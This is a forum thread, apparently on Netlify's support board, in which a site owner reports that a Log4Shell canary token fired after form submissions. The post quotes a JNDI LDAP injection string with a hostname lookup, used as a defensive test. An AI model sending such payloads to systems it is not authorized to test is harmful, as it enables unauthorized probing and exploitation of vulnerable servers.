I have a custom form on my website and a webhook which triggers a lambda function and I used https://canarytokens.org/ to test/verify the log4shell vulnerability and when the data is submited via netlify forms and called on lambda function the token were activated.
Note: Our lambda function in netlify doesn’t post the data to any external system and it’s interely in NodeJS.
I am not sure but as my lambda function is not using any external service and only netlify forms and netlify forms webhooks/notifications I am trying to understand where/which service is doing the query to the canary DNS.
I have submited my forms and replace the fields like name, text to JDNI ${jndi:ldap://x${hostName}.L4J. INSERT-COPIED-STRING-HERE /a} and the token received a DNS query, meaning that someone did query that token. So I am wondering who/where is the problem.
I have contacted netlify and have the full report with the IP but didn’t receive an answer yet.
You can follow the conversation about log4j here. Our security team is investigating.
If you have questions about form functionality or believe there is an error, we can continue the conversation about your form. If not, please head over to the other thread.
Hello Hillary, due the high risk on this issue is not possible for someone to advise and get in touch on this regards? I have all the logs including the IP of the servers that triggered the DNS query again the ldap string from canary token.